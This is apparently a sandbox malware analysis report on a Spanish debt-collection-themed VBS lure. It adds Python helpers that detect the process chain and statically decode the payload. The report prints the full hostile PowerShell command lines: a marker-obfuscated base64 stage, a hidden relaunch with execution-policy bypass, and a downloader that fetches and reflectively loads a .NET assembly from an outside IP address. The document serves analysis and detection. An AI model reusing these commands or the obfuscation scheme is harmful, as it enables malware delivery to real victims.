Analysis
-
max time kernel
45s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64 arch:x86 image:win7-20220715-en locale:en-us os:windows7-x64 system -
submitted
11/08/2022, 14:55
Static task
static1
Behavioral task
behavioral1
Sample
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs
Resource
win7-20220715-en
General
-
Target
Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs (Spanish lure filename; in English: "Your password is 118 Administrative proceeding in progress to collect your outstanding debts"; "pendient" is truncated in the filename itself)
-
Size
205KB
-
MD5
173a182f65910267fa0e8590dd0cfc0e
-
SHA1
3b8bf6b2f4ad725511fca0e0198b4499c75fe86c
-
SHA256
49bb9b1be17a3b590a8cb4245e1a3f07fb13648676ff7e0240f3030678c503d6
-
SHA512
44d5a9a9d2166253c2af4b8820f323d29a2cd7042a3408440bd86b8422d25a28006891ca9f690d756271e85d09965047c2eebcbd18b5af8a378ff0785924900d
Malware Config
Extracted
http://91.241.19.49/ARTS/dllf3txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow  pid   Process
3     2044  powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description for the signature; nothing else in this report, which records no file writes other than a Jump List artifact, shows encryption activity. The observed chain is a staged downloader that loads a .NET assembly in memory.)
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid   Process
240   powershell.exe
2044  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
description              pid   Process
Token: SeDebugPrivilege  240   powershell.exe
Token: SeDebugPrivilege  2044  powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description                       pid   Process         procid_target
PID 1940 wrote to memory of 240   1940  WScript.exe     27
PID 1940 wrote to memory of 240   1940  WScript.exe     27
PID 1940 wrote to memory of 240   1940  WScript.exe     27
PID 240 wrote to memory of 2044   240   powershell.exe  29
PID 240 wrote to memory of 2044   240   powershell.exe  29
PID 240 wrote to memory of 2044   240   powershell.exe  29
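The WriteProcessMemory rows above give the chain WScript.exe (1940) -> powershell.exe (240) -> powershell.exe (2044). The following is an added detection example, not part of the sandbox report or of any vendor's rule set: it runs a few process-tree and command-line heuristics over process-creation events. The event records are constructed to mirror the report's Processes section (command lines shortened, the stage-1 blob cut down to a prefix) plus one benign control; the pid/ppid/image/cmdline field names are an assumed generic schema, not a specific product's. Note that the recorded command lines spell the execution policy "Bypss", so the pattern below deliberately matches only the "byp" prefix.

```python
"""Heuristics over process-creation events for the chain in this report:
WScript.exe -> powershell.exe (decoder) -> powershell.exe (hidden downloader).

Added detection example; not from the sandbox report. EVENTS is constructed
from the report's Processes section (shortened) plus one benign control, and
the field names pid/ppid/image/cmdline are an assumed generic log schema.
"""
import re

VBS = (r"C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose "
       r"expediente administrativo para el cobro de sus deudas pendient.vbs")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    {"pid": 1940, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "' + VBS + '"'},
    {"pid": 240, "ppid": 1940, "image": PS,
     "cmdline": '"' + PS + '" -command '
                "$iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAl';"  # stage-1 blob cut down (constructed)
                "$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );"
                "powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD"},
    {"pid": 2044, "ppid": 240, "image": PS,
     "cmdline": '"' + PS + '" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command '
                "\"$RodaCopy = '" + VBS + "';[Byte[]] $DLL = [System.Convert]::FromBase64String("
                "(New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));"
                "[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg')"
                ".GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#\"HFJfb' ))\""},
    # Benign control (constructed): PowerShell started by a non-script-host parent.
    {"pid": 3100, "ppid": 1000, "image": PS,
     "cmdline": '"' + PS + r'" -NoProfile -File C:\scripts\inventory.ps1'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Command-line indicators, matched case-insensitively. The execution-policy
# pattern is a prefix match on purpose: the report's command lines say "Bypss",
# and a rule anchored on the literal word "Bypass" would not fire on them.
CMDLINE_INDICATORS = {
    "base64-decode": r"FromBase64String",
    "string-replace-deobfuscation": r"\.replace\(",
    "hidden-window": r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "executionpolicy-bypass-like": r"-(?:ex\w*|ep)\s+byp\w*",
    "reflective-assembly-load": r"AppDomain\]::CurrentDomain\.Load\(",
    "webclient-download": r"Net\.WebClient\)\.Download",
    # a second powershell invocation inside the arguments, not the quoted image path
    "nested-powershell": r"(?<![\w\\])powershell(?:\.exe)?\s+-",
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def indicators_for(event: dict, by_pid: dict) -> list[str]:
    """Parent-relationship hits first, then command-line hits, for one event."""
    hits = []
    parent = by_pid.get(event["ppid"])
    if basename(event["image"]) == "powershell.exe" and parent is not None:
        pname = basename(parent["image"])
        if pname in SCRIPT_HOSTS:
            hits.append("script-host-parent")
        elif pname == "powershell.exe":
            hits.append("powershell-parent")
    for name, pattern in CMDLINE_INDICATORS.items():
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            hits.append(name)
    return hits


def ancestry(pid: int, by_pid: dict) -> list[str]:
    """Image basenames from the oldest known ancestor down to pid."""
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def triage(events: list, min_hits: int = 2) -> dict:
    """pid -> indicator names for every event with at least min_hits hits."""
    by_pid = {e["pid"]: e for e in events}
    flagged = {}
    for e in events:
        hits = indicators_for(e, by_pid)
        if len(hits) >= min_hits:
            flagged[e["pid"]] = hits
    return flagged


if __name__ == "__main__":
    by_pid = {e["pid"]: e for e in EVENTS}
    for pid, hits in triage(EVENTS).items():
        print(pid, " -> ".join(ancestry(pid, by_pid)), hits)
```

On the constructed events only PIDs 240 and 2044 are flagged; the WScript.exe parent and the benign control produce no hits. The parent-relationship indicators do the heavy lifting: a script host spawning PowerShell, and PowerShell spawning a hidden PowerShell, are each rare enough in most estates to justify a lower threshold than the command-line tokens alone.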
Processes
-
Process tree (indentation shows parent/child depth; PIDs are the Windows PIDs from the run):

C:\Windows\System32\WScript.exe  [PID 1940]
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs"
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 240, child of 1940]
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 2044, child of 240]
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose expediente administrativo para el cobro de sus deudas pendient.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '&%$5tBTDY()R0%$#"HFJfb' ))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

Notes: the misspelt execution-policy value (Bypss) is present in both recorded command lines, so it is not a transcription error. The first PowerShell stage only decodes text (marker '⌚⌚⌚' restored to 'U', base64, UTF-16LE, placeholder replaced by the path of the running .vbs) and re-launches PowerShell hidden; the second stage fetches the next payload as base64 text, decodes it to bytes and loads it with AppDomain.Load, so no DLL is written to disk. The loaded method is handed a reversed URL, the path of the VBS itself and a fixed string.
-
-
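The two recorded powershell.exe command lines contain the complete decoding chain, so the second stage and its indicators can be recovered without running anything. The following is an added analysis helper, not part of the sandbox report or of the sample: it takes the $iUqm literal exactly as recorded for PID 240, undoes the marker substitution, base64 and UTF-16LE layers, applies the placeholder replacement, and then pulls the URLs, the reflection target and the Invoke() argument list out of the result. The only assumptions are the helper names and the VBS path, which is the one the sandbox ran the sample from. It performs no network access and never evaluates the decoded script.

```python
"""Static recovery of the stage-2 PowerShell from the stage-1 command line.

Added analysis helper; not part of the sandbox report or the sample. It only
undoes the encoding layers visible in the report and never runs the result.
"""
import base64
import re

# $iUqm literal copied from the PID 240 command line in the report: base64 of
# UTF-16LE text in which every 'U' was swapped for the three-character marker.
STAGE1_BLOB = "JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACYAJQAkAD⌚⌚⌚AdABCAFQARABZACgAKQBSADAAJQAkACMAIgBIAEYASgBmAGIAJwAgACkAKQA="

# Marker, replacement letter and placeholder token, all from the same command line.
MARKER = "⌚⌚⌚"
MARKER_LETTER = "U"
PATH_PLACEHOLDER = "%KItOOPUiSOUlQDjvXAOg%"

# Path the sandbox ran the sample from (PID 1940 command line in the report).
VBS_PATH = (r"C:\Users\Admin\AppData\Local\Temp\Su contraseña es 118 Tramitándose "
            r"expediente administrativo para el cobro de sus deudas pendient.vbs")


def decode_stage1(blob: str, marker: str = MARKER, letter: str = MARKER_LETTER) -> str:
    """Reverse .replace(marker, letter) -> FromBase64String -> Unicode.GetString."""
    restored = blob.replace(marker, letter)
    return base64.b64decode(restored).decode("utf-16-le")


def render_stage2(script: str, vbs_path: str = VBS_PATH) -> str:
    """Apply the second .replace(): placeholder token -> path of the running .vbs."""
    return script.replace(PATH_PLACEHOLDER, vbs_path)


def string_literals(script: str) -> list[str]:
    """All single-quoted PowerShell string literals, in order."""
    return re.findall(r"'([^']*)'", script)


def unreverse_urls(script: str) -> list[str]:
    """Literals that are a URL written backwards, returned the right way round."""
    found = []
    for lit in string_literals(script):
        rev = lit[::-1]
        if rev.startswith(("http://", "https://")):
            found.append(rev)
    return found


def download_urls(script: str) -> list[str]:
    """Forward-written URLs (the one the report lists under Malware Config)."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def reflection_target(script: str) -> tuple:
    """(type name, method name) passed to GetType()/GetMethod() on the loaded assembly."""
    t = re.search(r"GetType\('([^']+)'\)", script)
    m = re.search(r"GetMethod\('([^']+)'\)", script)
    return (t.group(1) if t else None, m.group(1) if m else None)


def invoke_arguments(script: str) -> list[str]:
    """Raw comma-separated tokens of the [object[]] array handed to Method.Invoke()."""
    m = re.search(r"\[object\[\]\]\s*\((.*)\)\s*\)", script)
    if not m:
        return []
    return [tok.strip() for tok in m.group(1).split(",")]


def summarize(blob: str = STAGE1_BLOB) -> dict:
    """Decode stage 1, render stage 2 and collect the indicators from it."""
    stage2 = render_stage2(decode_stage1(blob))
    return {
        "download_urls": download_urls(stage2),
        "reversed_urls": unreverse_urls(stage2),
        "reflection": reflection_target(stage2),
        "invoke_args": invoke_arguments(stage2),
        "stage2": stage2,
    }


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

The recovered stage 2 is the PID 2044 command line from the report; the reversed first Invoke() argument resolves to a second URL on the same host as the download in Malware Config, which is worth adding to the block list alongside the one the sandbox extracted. Keep the decoded text as data: the point of doing this in Python rather than by pasting the literal into PowerShell is that nothing here can execute the payload.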
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize  7KB
MD5       f007338b947c62892340662049c231df
SHA1      93bb79455ff72b60c1e90c842c5d1df7c197d9d6
SHA256    96f4a8433a83acc63123737e9c5b3f8c7ab50bc25ad1e9b6a44987a922e946a4
SHA512    2ac8c1ac97fdbf1ad621e69da75535521e8af805acf55af29db733831fd44c3c845db28390429ece6e58607f676aa99b19fb5c4c3975303734c4aa9322343376
(This is a Jump List file under the user's Recent folder, written by Windows during the run; it is an execution artifact, not a payload dropped by the sample. The second-stage assembly fetched from http://91.241.19.49/ARTS/dllf3txt is loaded from memory via AppDomain.Load and does not appear in this listing.)